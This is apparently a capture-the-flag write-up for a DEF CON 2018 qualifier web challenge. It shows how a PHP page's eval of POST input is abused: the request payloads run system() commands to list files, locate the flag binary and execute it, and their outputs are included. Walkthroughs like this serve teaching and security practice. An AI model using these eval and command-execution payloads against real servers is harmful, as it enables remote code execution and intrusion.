Tags: web 

Rating: 3.5

# ▼▼▼PHP Eval White-List(Web)192/586team solved=32.8%
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

```
PHP was dangerous, so we've fixed it!

http://c67f8ffd.quals2018.oooverflow.io

Files:websec_eval_wl.so
```

---

**【Understanding function and access restrictions】**

http://c67f8ffd.quals2018.oooverflow.io

```
PHP - Custom eval whitelisting!
PHP is dangerous, so we wrote a custom php extension to improve its security. We're also taking advantage of the open_basedir directive to prevent you from accessing the flag binary up the current folder. You can check the source of the page here.
```

There are the following access restrictions

```
・custom php extension:websec_eval_wl.so
・open_basedir()
```

---

Also, source code is provided

http://c67f8ffd.quals2018.oooverflow.io/source.txt

```

<html>
<head>
<title>php as a service</title>
<link rel='stylesheet' href='bootstrap.min.css' />
</head>
<body>
<div id='main'>
<div class='container'>
<div class='row'>
<h1>PHP<small> - Custom eval whitelisting!</small></h1>
</div>
<div class='row'>


PHP is dangerous, so we wrote a custom php extension to
improve its security. We're also taking advantage of the open_basedir
directive to prevent you from accessing the flag binary up the current folder.
You can check the source of the page here.


</div>
</div>
<div class='container '>
<div class='row '>
<form action='' method='post' class="form-inline">
<div class="form-group">
<div class="input-group">
<div class="input-group-addon">Code to eval</div>
<input type='text' name='d' id='d' class="form-control" value='printf(1+1);'>

</div>
</div>
<div class="form-group">
<input type='submit' value='Run!' class="btn btn-default" name='submit'>
</div>
</form>
</div>
</div>


<div class='container'>


./flag binary?';
}?>


</div>
</div>
</body>
</html>
```

Arbitrary code is executable

`eval($_POST['d']);`

---

**【Information gathering by arbitrary code execution】**

```
POST / HTTP/1.1
Host: c67f8ffd.quals2018.oooverflow.io
Content-Type: application/x-www-form-urlencoded

d=system("ls -al");&submit=Run
```

```
total 180
drwxr-xr-x 3 root root 4096 May 12 18:10 .
drwxr-xr-x 3 root root 4096 May 11 16:29 ..
-rw-r--r-- 1 root root 108376 May 5 04:58 bootstrap.min.css
-rw-r--r-- 1 root root 1672 May 12 18:09 index.php
-rw-r--r-- 1 root root 155 May 5 04:58 source.php
-rw-r--r-- 1 root root 1672 May 12 18:09 source.txt
d-wx-wx-wx 2 root root 16384 May 14 11:40 tmp
-rw-r--r-- 1 root root 33784 May 5 04:58 websec_eval_wl.so
```

The `tmp` folder can be written, but I can exploit without using it

---

**【Identify the location of flag】**

TOP screen has the following description

`Can you execute the ./flag binary?`

---

I searched for an executable flag

× d= `system('file ./../../flag');` ⇒ `./../../flag: cannot open './../../flag' (No such file or directory)`

○ d= `system('file ./../flag');` ⇒ `./../flag: executable, regular file, no read permission`

× d= `system('file ./flag');` ⇒ `./flag: cannot open './flag' (No such file or directory)`

× d= `system('file ./tmp/flag');` ⇒ `./tmp/flag: ASCII text, with very long lines`  ※This is a fake flag

---

**【exploit】**

d= `system(' ./../flag');`

`OOO{Fortunately_php_has_some_rock_solid_defense_in_depth_mecanisms,_so-everything_is_fine.}`